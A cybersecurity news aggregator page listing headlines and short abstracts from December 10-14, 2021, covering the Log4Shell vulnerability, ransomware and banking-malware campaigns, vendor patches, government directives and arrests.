Abstract The Apache Software Foundation (ASF) has pushed out a new fix for the Log4j logging utility after the previous patch for the recently disclosed Log4Shell exploit was deemed as "incomplete in certain non-default configurations." The second vulnerability — tracked as CVE-2021-45046 — is rated 3.7 out of a maximum of 10 on the CVSS rating system and affects all versions of Log4j from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0, which the project maintainers shipped last week to address a critical remote code execution vulnerability (CVE-2021-44228) that could be abused to infiltrate and take over systems. The incomplete patch for CVE-2021-44228 could be abused to "craft malicious input data using a JNDI Lookup pattern resulting in a denial-of-service (DoS) attack," the ASF said in a new advisory. The latest version of Log4j, 2.16.0 (for users requiring Java 8 or later), all but removes support for message lookups and disables JNDI by default, the

The Hacker News

December 14, 2021 – Attack

Telecom operators targeted in recent espionage hacking campaign Full Text

Abstract Researchers have spotted a new espionage campaign targeting telecommunication and IT service providers in the Middle East and Asia.

BleepingComputer

December 14, 2021 – General

Americans Lost Almost $150 Million to Gift Card Scams: FTC Full Text

Abstract Almost 40,000 consumers reported falling victim to scams that involved gift cards as a payment method. This year, Target gift cards remained the top choice among cybercriminals.

Cyware Alerts - Hacker News

December 14, 2021 – Vulnerabilities

DHS announces bug bounty program to hunt down cyber vulnerabilities Full Text

Abstract The Department of Homeland Security (DHS) on Tuesday announced a new bug bounty program meant to help tackle cyber vulnerabilities in the agency. 

The Hill

December 14, 2021 – Hacker

Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware Full Text

Abstract Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files. The vulnerability is tracked as CVE-2021-44228 and is also known by the monikers "Log4Shell" or "Logjam." In simple terms, the bug could force an affected system to download malicious software, giving the attackers a digital beachhead on servers located within corporate networks. Log4j is an open-source Java library maintained by the nonprofit Apache Software F

The Hacker News

December 14, 2021 – Vulnerabilities

Adobe addresses over 60 vulnerabilities in multiple products Full Text

Abstract Adobe warns of threat actors that could exploit critical vulnerabilities in multiple products running on Windows and macOS systems. Adobe has issued critical warnings for more than 60 vulnerabilities in multiple products running on Windows and macOS...

Security Affairs

December 14, 2021 – Attack

400 Banks’ Customers Targeted with Anubis Trojan Full Text

Abstract The new campaign masqueraded as an Orange Telecom account management app to deliver the latest iteration of Anubis banking malware.

Threatpost

December 14, 2021 – Ransomware

New ransomware now being deployed in Log4Shell attacks Full Text

Abstract The first public case of the Log4j Log4Shell vulnerability used to download and install ransomware has been discovered by researchers.

BleepingComputer

December 14, 2021 – Outage

Second Cyberattack Within a Week Disrupts COVID-19 Vaccine Certification in Brazil Full Text

Abstract Brazil's Ministry of Health has suffered a second cyberattack in less than a week, which has compromised various internal systems, including the platform that holds COVID-19 vaccination data.

ZDNet

December 14, 2021 – Government

USPS secretly tested mobile voting system: report Full Text

Abstract The U.S. Postal Service worked on a secret project to test a blockchain-based mobile phone voting system ahead of the 2020 elections before ultimately abandoning the project, according to The Washington Post.

The Hill

December 14, 2021 – Education

How Extended Security Posture Management Optimizes Your Security Stack Full Text

Abstract As a CISO, one of the most challenging questions to answer is "How well are we protected right now?" Between the acceleration of hackers' offensive capabilities and the dynamic nature of information networks, a drift in the security posture is unavoidable and needs to be continuously compensated. Therefore, answering that question implies continuously validating the security posture and being in a position to check it, including against the latest emerging threats. Yet, the bulk of cybersecurity is focused on defensive tools. The combination of the rapid evolution of technology and the multiplication of technology layers, combined with the professionalization of the threat landscape, has led to a profusion of cybersecurity tools tackling different security aspects. Checking the cybersecurity solution stack efficiency is typically done through pen-testing or, more recently, through red teaming – an exercise aimed to map possible loopholes that would lead to a data breac

The Hacker News

December 14, 2021 – Ransomware

Hackers exploit Log4Shell to drop Khonsari Ransomware on Windows systems Full Text

Abstract Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell flaw to deliver the new Khonsari ransomware on Windows machines. Bitdefender researchers discovered that threat actors are attempting to exploit the Log4Shell...

Security Affairs

December 14, 2021 – Hacker

‘Seedworm’ Attackers Target Telcos in Asia, Middle East Full Text

Abstract The focused attacks aimed at cyberespionage and lateral movement appear to hint at further ambitions by the group, including supply-chain threats.

Threatpost

December 14, 2021 – Government

DHS announces ‘Hack DHS’ bug bounty program for vetted researchers Full Text

Abstract The Department of Homeland Security (DHS) has launched a new bug bounty program dubbed "Hack DHS" that allows vetted cybersecurity researchers to find and report security vulnerabilities in external DHS systems.

BleepingComputer

December 14, 2021 – Government

CISA tells federal agencies to patch Log4Shell before Christmas Full Text

Abstract Federal agencies have ten days to test which of their internal apps and servers utilize the Log4j Java library, check if systems are vulnerable to the Log4Shell exploit, and patch affected servers.

The Record

December 14, 2021 – Attack

Human resource management group hit by ransomware attack Full Text

Abstract Ultimate Kronos Group (UKG), a human resources management provider, was hit by a ransomware attack earlier this week, the company confirmed. 

The Hill

December 14, 2021 – Government

US CISA orders federal agencies to fix Log4Shell by December 24th Full Text

Abstract US CISA ordered federal agencies to address the critical Log4Shell vulnerability in the Log4j library by December 24th, 2021. US CISA ordered federal agencies to address the critical Log4Shell vulnerability in the Log4j library by December 24th,...

Security Affairs

December 14, 2021 – Vulnerabilities

Microsoft fixes Windows AppX Installer zero-day used by Emotet Full Text

Abstract Microsoft has patched a high severity Windows zero-day vulnerability exploited in the wild to deliver Emotet malware payloads.

BleepingComputer

December 14, 2021 – Criminals

Forget the dark web: ransomware gangs weaponize social media to pressure victims Full Text

Abstract In an effort to amplify coverage, some ransomware groups are using social media channels to bring news of their conquests to a wider audience and put more pressure on victims to pay the ransom.

Emsisoft

December 14, 2021 – Attack

Virginia General Assembly’s IT unit hit by ransomware attack Full Text

Abstract The information technology unit for Virginia’s General Assembly has been hit by a ransomware attack, which barred legislators and staff from accessing the system that handles bills.

The Hill

December 14, 2021 – Vulnerabilities

Google fixed the 17th zero-day in Chrome since the start of the year Full Text

Abstract Google has released Chrome 96.0.4664.110 to address a high-severity zero-day vulnerability, tracked as CVE-2021-4102, exploited in the wild. Google released security updates to address five vulnerabilities in the Chrome web browser, including...

Security Affairs

December 14, 2021 – Vulnerabilities

Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flaws Full Text

Abstract Today is Microsoft's December 2021 Patch Tuesday, and with it comes fixes for six zero-day vulnerabilities and a total of 67 flaws. These updates include a fix for an actively exploited Windows Installer vulnerability used in malware distribution campaigns.

BleepingComputer

December 14, 2021 – Malware

Owowa: the add-on that turns your OWA into a credential stealer and remote access panel Full Text

Abstract Owowa is a C#-based .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA) to credential theft and remote access.

Kaspersky Labs

December 14, 2021 – Vulnerabilities

Cyber experts express growing alarm over Apache vulnerability Full Text

Abstract A vulnerability in a widely used logging platform uncovered late last week has left security professionals and officials scrambling to respond and patch systems before other nations and cybercriminals can exploit the flaw.

The Hill

December 14, 2021 – Malware

TinyNuke banking malware targets French organizations Full Text

Abstract The TinyNuke malware is back and now was used in attacks aimed at French users working in manufacturing, technology, construction, and business services. Proofpoint researchers uncovered a campaign exclusively targeting French entities and organizations...

Security Affairs

December 14, 2021 – Solution

Microsoft rolls out end-to-end encryption for Teams calls Full Text

Abstract Microsoft announced today the general availability of end-to-end encryption (E2EE) support for one-to-one Microsoft Teams calls.

BleepingComputer

December 14, 2021 – Ransomware

Inside Ireland’s Public Healthcare Ransomware Scare – Krebs on Security Full Text

Abstract The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system.

Krebs on Security

December 14, 2021 – Hacker

Hackers steal Microsoft Exchange credentials using IIS module Full Text

Abstract Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely.

BleepingComputer

December 14, 2021 – Vulnerabilities

Zero-Day Vulnerability in Hillrom Cardiology Devices Could Allow Attackers to Seize Control Full Text

Abstract A high-severity vulnerability in several cardiac healthcare devices could allow attackers to access privileged accounts without a password and seize control of the devices.

The Daily Swig

December 14, 2021 – Malware

Anubis Android malware returns to target 394 financial apps Full Text

Abstract The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.

BleepingComputer

December 14, 2021 – Outage

Cyberattack on BHG opioid treatment network disrupts patient care Full Text

Abstract Opioid treatment network Behavioral Health Group suffered a cyberattack that led to an almost week-long disruption of IT systems and patient care.

BleepingComputer

December 14, 2021 – Government

CISA orders federal agencies to patch Log4Shell by December 24th Full Text

Abstract The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell remote code execution vulnerability and released mitigation guidance in response to active exploitation.

BleepingComputer

December 14, 2021 – Vulnerabilities

Log4j: List of vulnerable products and vendor advisories Full Text

Abstract News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday.

BleepingComputer

December 13, 2021 – Criminals

Ransomware Affiliate Arrested in Romania; 51 Stolen Data Brokers Arrested in Ukraine Full Text

Abstract Europol, the European Union's premier law enforcement agency, has announced the arrest of a third Romanian national for his role as a ransomware affiliate suspected of hacking high-profile organizations and companies and stealing large volumes of sensitive data. The 41-year-old unnamed individual was apprehended Monday morning at his home in Craiova, Romania, by the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) following a joint investigation in collaboration with the U.S. Federal Bureau of Investigation (FBI). It's not currently known which ransomware gang the suspect was working with, but the development comes a little over a month after Romanian authorities arrested two affiliates of the REvil ransomware family, who are believed to have orchestrated no fewer than 5,000 ransomware attacks and extorted close to $600,000 from victims. Affiliates play a key role in ransomware-as-a-service (RaaS) subscription-based business models, and a

The Hacker News

December 13, 2021 – General

Where the Latest Log4Shell Attacks Are Coming From Full Text

Abstract Analysts find at least 10 Linux botnets actively exploiting Log4Shell flaw.

Threatpost

December 13, 2021 – Vulnerabilities

Latest Apple iOS Update Patches Remote Jailbreak Exploit for iPhones Full Text

Abstract Apple on Monday released updates to iOS, macOS, tvOS, and watchOS with security patches for multiple vulnerabilities, including a remote jailbreak exploit chain as well as a number of critical issues in the Kernel and Safari web browser that were first demonstrated at the Tianfu Cup held in China two months ago. Tracked as CVE-2021-30955, the issue could have enabled a malicious application to execute arbitrary code with kernel privileges. Apple said it addressed the issue with "improved state handling." The flaw also impacts macOS devices. "The kernel bug CVE-2021-30955 is the one we tried [to] use to build our remote jailbreak chain but failed to complete on time," Kunlun Lab's chief executive, @mj0011sec, said in a tweet. A set of kernel vulnerabilities were eventually harnessed by the Pangu Team at the Tianfu hacking contest to break into an iPhone13 Pro running iOS 15, a feat that netted the white hat hackers $330,000 in cash rewards. Besid

The Hacker News

December 13, 2021 – Breach

Malicious PyPI Code Packages Rack Up Thousands of Downloads Full Text

Abstract The Python code repository was infiltrated by malware bent on data exfiltration from developer apps and more.

Threatpost

December 13, 2021 – Vulnerabilities

Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild Full Text

Abstract Google has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the 17th such weakness to be disclosed since the start of the year. Tracked as CVE-2021-4102, the flaw relates to a use-after-free bug in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw. As it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, "it's aware of reports that an exploit for CVE-2021-4102 exists in the wild." This is done in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors. CVE-2021-4102 is the second use-after-free vulnerability in V8 the comp

The Hacker News

December 13, 2021 – Vulnerabilities

Google pushes emergency Chrome update to fix zero-day used in attacks Full Text

Abstract Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.

BleepingComputer

December 13, 2021 – Cryptocurrency

Cryptocurrency Exchange AscendEX Discloses Hacking Incident Involving Illicit Transactions from Hot Wallets Full Text

Abstract The largest share of the $77 million was accounted for by the relatively minor taraxa (TARA) with $10.8 million, while the combined shares of stablecoins USDT and USDC accounted for $10.7 million.

Yahoo! Finance

December 13, 2021 – Hacker

Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group Full Text

Abstract A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10. "The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said. "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment." 95% of the known victims are based in North America, while the remaining 5% are in

The Hacker News

December 13, 2021 – Government

Responding to Fischerkeller on Initiative Persistence Full Text

Abstract The U.S. may be justified in seeking to contain China’s aggression and search for dominance in cyberspace with the 2018 USCC Command Vision. But it has yet to square this with a willingness to accept similar Chinese efforts to advance Chinese goals in cyberspace.

Lawfare

December 13, 2021 – Vulnerabilities

Practical coexistence attacks on billions of WiFi chips allow data theft and traffic manipulation Full Text

Abstract Boffins discovered bugs in WiFi chips that can be exploited to extract passwords and manipulate traffic by targeting a device's Bluetooth component. A group of researchers from the University of Darmstadt, University of Brescia, CNIT, and the Secure...

Security Affairs

December 13, 2021 – Outage

Kronos Ransomware Outage Drives Widespread Payroll Chaos Full Text

Abstract Kronos, the workforce-management provider, said a weeks-long outage of its cloud services is in the offing, just in time to hamstring end-of-year HR activities like bonuses and vacation tracking.

Threatpost

December 13, 2021 – Malware

TinyNuke info-stealing malware is again attacking French users Full Text

Abstract The info-stealing malware TinyNuke has re-emerged in a new campaign targeting French users with invoice-themed lures in emails sent to corporate addresses and individuals working in manufacturing, technology, construction, and business services.

BleepingComputer

December 13, 2021 – Criminals

Romanian ransomware suspect arrested in joint Europol, FBI operation Full Text

Abstract A Romanian man accused of using ransomware to hack high-profile organizations and companies was arrested Monday as part of a joint operation between the Romanian National Police, the FBI, and Europol.

Cyberscoop

December 13, 2021 – General

Top 3 SaaS Security Threats for 2022 Full Text

Abstract With 2021 drawing to a close and many closing their plans and budgets for 2022, the time has come to do a brief wrap-up of the SaaS Security challenges on the horizon. Here are the top 3 SaaS security posture challenges as we see them. 1 — The Mess of Misconfiguration Management The good news is that more businesses than ever are using SaaS apps such as GitHub, Microsoft 365, Salesforce, Slack, SuccessFactors, Zoom, and many others, to enable employees to maintain productivity under the most challenging of circumstances. As for the bad news, many companies are having a hard time adequately addressing the ever-changing security risks of each app. This challenge begins with a simple miscalculation: businesses are tasking security teams to ensure that the security configurations for each app are set correctly. While that may seem like the logical choice, these apps are like snowflakes, no two are the same, including their specific settings and configurations. This is exacerbated

The Hacker News

December 13, 2021 – Vulnerabilities

CISA adds Log4Shell Log4j flaw to the Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 13 new vulnerabilities...

Security Affairs

December 13, 2021 – Phishing

Phishing campaign uses PowerPoint macros to drop Agent Tesla Full Text

Abstract A new variant of the Agent Tesla malware has been spotted in an ongoing phishing campaign that relies on Microsoft PowerPoint documents laced with malicious macro code.

BleepingComputer

December 13, 2021 – Malware

TinyNuke Banking Malware Resurges with Invoice-themed Malspam Aimed at French Entities Full Text

Abstract The campaigns use invoice-themed lures to target hundreds of customers of organizations in various industries including manufacturing, technology, construction, and business services.

Proof Point

December 13, 2021 – Malware

Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan Full Text

Abstract Infection chains associated with the multi-purpose Qakbot malware have been broken down into "distinct building blocks," an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it." Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns. First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second st

The Hacker News

December 13, 2021 – Vulnerabilities

Log4Shell was in the wild at least nine days before public disclosure Full Text

Abstract Threat actors are already abusing Log4Shell vulnerability in the Log4j library for malicious purposes such as deploying malware. A few hours ago, researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...

Security Affairs

December 13, 2021 – Vulnerabilities

Dell driver fix still allows Windows Kernel-level attacks Full Text

Abstract Dell's driver fix of the CVE-2021-21551 vulnerability leaves margin for catastrophic BYOVD attacks resulting in Windows kernel driver code execution.

BleepingComputer

December 13, 2021 – Malware

Hancitor maldoc drops via Windows Clipboard Full Text

Abstract Hancitor, a malware loader that provides Malware-as-a-Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more.

McAfee

December 13, 2021 – Botnet

Two Linux botnets already exploit Log4Shell flaw in Log4j Full Text

Abstract Immediately after the disclosure of the Log4Shell flaw in Log4j library threat actors started including the exploit code in Linux botnets. Researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...

Security Affairs

December 13, 2021 – Ransomware

Kronos ransomware attack may cause weeks of HR solutions downtime Full Text

Abstract Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.

BleepingComputer

December 13, 2021 – Policy and Law

Germany Jails Operators of ‘Cyberbunker’ Darknet Hub Full Text

Abstract They are said to have hosted, or provided the internet architecture for, illegal websites that peddled stolen data and forged documents, and from which large-scale cyberattacks were carried out.

Security Week

December 13, 2021 – Vulnerabilities

Attackers can get root by crashing Ubuntu’s AccountsService Full Text

Abstract A local privilege escalation security vulnerability could allow attackers to gain root access on Ubuntu systems by exploiting a double-free memory corruption bug in GNOME's AccountsService component.

BleepingComputer

December 13, 2021 – General

How C-suite executives perceive their organizations’ readiness for ransomware attacks Full Text

Abstract A new (ISC)² study underscores the need for better communication between security teams and executives and offers best practices security leaders should implement to improve those interactions.

Help Net Security

December 13, 2021 – General

EV certificate usage declining: Is the internet becoming more secure? Full Text

Abstract According to Venafi, 72% of sites now actively redirect traffic to use HTTPS, a 15% increase since March 2020. Almost one in five of the top 1 million sites now use HSTS, a 44% rise since March 2020.

Help Net Security

December 13, 2021 – Vulnerabilities

Bugs in billions of WiFi, Bluetooth chips allow password, data theft Full Text

Abstract Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it's possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device's Bluetooth component.

BleepingComputer

December 13, 2021 – Phishing

A phishing campaign targets clients of German banks using QR codes Full Text

Abstract The messages used in a campaign recently discovered by Cofense use QR codes to deceive users of two German banks, Sparkasse and Volksbanken Raiffeisenbanken, and steal digital banking information.

Security Affairs

December 13, 2021 – Criminals

Ukraine arrests 51 for selling data of 300 million people in US, EU Full Text

Abstract Ukrainian law enforcement arrested 51 suspects believed to have been selling, on hacking forums, stolen personal data belonging to hundreds of millions of people worldwide, including in Ukraine, the US, and Europe.

BleepingComputer

December 13, 2021 – Hacker

Hacker Poses As Support Rep to Breach Cox Communications Full Text

Abstract The impacted data includes the Cox account number, access PIN, security questions and answers, list of active Cox services, Cox.net email address, name, address, and phone number of many customers.

Forbes

December 13, 2021 – Criminals

Police arrests ransomware affiliate behind high-profile attacks Full Text

Abstract Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.

BleepingComputer

December 13, 2021 – Malware

Malicious PyPI packages with over 10,000 downloads taken down Full Text

Abstract The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers' report.

BleepingComputer

December 12, 2021 – Vulnerabilities

Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack Full Text

Abstract Threat actors are actively weaponizing unpatched servers affected by the newly identified "Log4Shell" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light. Netlab, the networking security division of Chinese tech giant Qihoo 360, disclosed that threats such as Mirai and Muhstik (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow their computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) earlier this September. The latest development comes as it has emerged that the vulnerability had been under attack for more than a week prior to its public disclosure on D

The Hacker News

December 12, 2021 – Hacker

Hackers start pushing malware in worldwide Log4Shell attacks Full Text

Abstract Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we compiled the known payloads, scans, and attacks using the Log4j vulnerability.

BleepingComputer

December 12, 2021 – Outage

Quebec shuts down thousands of sites as disclosure of the Log4Shell flaw Full Text

Abstract Quebec shut down nearly 4,000 of its sites in response to the discovery of the Log4Shell flaw in the Apache Log4j Java-based logging library. Quebec shut down nearly 4,000 of its sites as a preventative measure after the disclosure of a PoC exploit...

Security Affairs

December 12, 2021 – General

FTC: Americans lost $148 million to gift card scams this year Full Text

Abstract The US Federal Trade Commission (FTC) said Americans reported losing $148 million to gift card scams during the first nine months of 2021 following a major increase compared to last year.

BleepingComputer

December 12, 2021 – Policy and Law

Russian national sentenced to 48 months in prison for helping Kelihos Botnet to evade detection Full Text

Abstract A United States court has sentenced Russian citizen Oleg Koshkin to four years in prison for his role in Kelihos botnet development. Oleg Koshkin (41) has been sentenced to 48 months in prison for one count of conspiracy to commit computer...

Security Affairs

December 12, 2021 – Phishing

A phishing campaign targets clients of German banks using QR codes Full Text

Abstract Cofense researchers discovered a new phishing campaign using QR codes targeting German e-banking users in recent weeks. Threat actors continue to use multiple techniques to avoid detection and trick recipients into opening phishing messages, including...

Security Affairs

December 12, 2021 – General

Security Affairs newsletter Round 344 Full Text

Abstract A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....

Security Affairs

December 11, 2021 – Vulnerabilities

MANGA Found Targeting RCE Vulnerability in TP-Link Product Full Text

Abstract Botnet operator MANGA was spotted abusing a recently disclosed vulnerability to hijack TP-Link routers and add them to their network of hacked devices. Attackers started exploiting the flaw just two weeks after TP-Link released the firmware update. Experts recommend always updating devices regu ...

Cyware Alerts - Hacker News

December 11, 2021 – Ransomware

BlackCat: A New Sophisticated Ransomware in Rust Full Text

Abstract Researchers unearth the first professional ransomware variant written in Rust, dubbed BlackCat. It can target Windows, Linux, and VMware ESXi systems. The threat group uses a double extortion model and looks for partners to whom it offers a huge 80%–90% ransom cut. As per claims, the author of Bl ...

Cyware Alerts - Hacker News

December 11, 2021 – Malware

Microsoft: These are the building blocks of QBot malware attacks Full Text

Abstract As QBot campaigns increase in size and frequency, researchers are looking into ways to break the trojan's distribution chain and tackle the threat.

BleepingComputer

December 11, 2021 – Botnet

Moobot Botnet Eyes Hikvision Products Full Text

Abstract Moobot, a Mirai-based botnet, is reportedly abusing a critical flaw in the webserver of many Hikvision products, which were sanctioned by the U.S. in the wake of human rights abuse. The botnet is abusing a critical command injection flaw to target unpatched devices and extract sensitive data from v ...

Cyware Alerts - Hacker News

December 11, 2021 – Vulnerabilities

Western Digital SanDisk SecureAccess flaws allow brute force and dictionary attacks Full Text

Abstract Vulnerabilities in the Western Digital SanDisk SecureAccess can be exploited to access user data through brute force and dictionary attacks. Western Digital has released updates for its SanDisk SecureAccess software to fix multiple vulnerabilities...

Security Affairs

December 11, 2021 – Criminals

New ‘Karakurt’ cybercrime gang focuses on data theft and extortion Full Text

Abstract Accenture researchers detailed the activity of a new sophisticated cybercrime group, called Karakurt, behind recent cyberattacks. Accenture researchers detailed the activity of a sophisticated financially motivated threat actor called Karakurt. The activity...

Security Affairs

December 11, 2021 – Solution

Cybereason released Logout4Shell, a vaccine for Log4Shell Apache Log4j RCE Full Text

Abstract Cybereason researchers released a "vaccine" that mitigates the critical 'Log4Shell' Apache Log4j code execution vulnerability. Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for a critical remote code execution zero-day...

Security Affairs

December 10, 2021 – Solution

Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk Full Text

Abstract The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems. Tracked as CVE-2021-44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default." Exploitation can be achieved by a single string of text, which c

The Hacker News

December 10, 2021 – Solution

Researchers release ‘vaccine’ for critical Log4Shell vulnerability Full Text

Abstract Researchers from cybersecurity firm Cybereason have released a "vaccine" that can be used to remotely mitigate the critical 'Log4Shell' Apache Log4j code execution vulnerability running rampant through the Internet.

BleepingComputer

December 10, 2021 – Attack

Over 1.6 Million WordPress Sites Targeted in Couple of Days with Attacks on Plugins and Themes Full Text

Abstract Wordfence researchers spotted a massive wave of attacks in recent days targeting over 1.6 million WordPress sites from 16,000 IPs via four different plugins and several Epsilon Framework themes.

Security Affairs

December 10, 2021 – Government

Officials press for actionable recommendations from new cyber advisory committee Full Text

Abstract Top officials at the Department of Homeland Security (DHS) on Friday urged a newly established advisory committee composed of experts from across sectors to propose solutions to help tackle the growing wave of cyberattacks faced by the nation.

The Hill

December 10, 2021 – Ransomware

BlackCat: A New Rust-based Ransomware Malware Spotted in the Wild Full Text

Abstract Details have emerged about what is the first Rust-language-based ransomware strain spotted in the wild that has already amassed "some victims from different countries" since its launch last month. The ransomware, dubbed BlackCat, was disclosed by MalwareHunterTeam. "Victims can pay with Bitcoin or Monero," the researchers said in a series of tweets detailing the file-encrypting malware. "Also looks they are giving credentials to intermediaries" for negotiations. BlackCat, akin to many other variants that have sprung up before it, operates as a ransomware-as-a-service (RaaS), wherein the core developers recruit affiliates to breach corporate environments and encrypt files, but not before stealing the said documents in a double extortion scheme to pressure the targets into paying the requested amount or risk exposure of the stolen data should the companies refuse to pay up. Security researcher Michael Gillespie called it a "very sophisticated

The Hacker News

December 10, 2021 – Vulnerabilities

What’s the Deal with the Log4Shell Security Nightmare? Full Text

Abstract The details behind a massive cyber problem.

Lawfare

December 10, 2021 – Breach

Volvo Cars suffers a data breach. Is it a ransomware attack? Full Text

Abstract Swedish automotive manufacturer Volvo Cars revealed that it has suffered a cyberattack that resulted in the theft of R&D data. Swedish automotive manufacturer Volvo Cars revealed that threat actors have stolen R&D data from its systems. In...

Security Affairs

December 10, 2021 – Education

Next-Gen Maldocs & How to Solve the Human Vulnerability Full Text

Abstract Malicious email attachments with macros are one of the most common ways hackers get in through the door. Huntress security researcher John Hammond discusses how threat hunters can fight back.

Threatpost

December 10, 2021 – Ransomware

The Week in Ransomware - December 10th 2021 - Project CODA Full Text

Abstract This week has quite a bit of ransomware news, including arrests, a new and sophisticated ransomware, and an attack bringing down 300 supermarkets in England.

BleepingComputer

December 10, 2021 – Malware

Decade-old Modular Banking Trojan Adds Capability of Delivering Ransomware Payloads Full Text

Abstract Qakbot has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn't a Qakbot attack.

ZDNet

December 10, 2021 – Government

Officials, experts sound the alarm about critical cyber vulnerability Full Text

Abstract Officials and cyber experts on Friday sounded the alarm about a critical logging vulnerability that could potentially impact thousands of organizations, racing to implement patches before hackers can exploit the opening.

The Hill

December 10, 2021 – Attack

1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses Full Text

Abstract As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes. WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions. The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018. The impacted Epsilon Framework themes and their corresponding versions are as follows — Activello (<=1.4.1) Affluent (<1.1.0) Allegiant (<=1.2.5) Antreas (<=1.0.6) Bonkers (<=1.0.5) Brilliance (<=1.2.9) Illdy (<=2.1.6)

The Hacker News

December 10, 2021 – Government

Australian ACSC warns of Conti ransomware attacks against local orgs Full Text

Abstract The Australian Cyber Security Centre (ACSC) warns of Conti ransomware attacks against multiple Australian organizations. The Australian Cyber Security Centre (ACSC) warns of Conti ransomware attacks against multiple Australian organizations from various...

Security Affairs

December 10, 2021 – Phishing

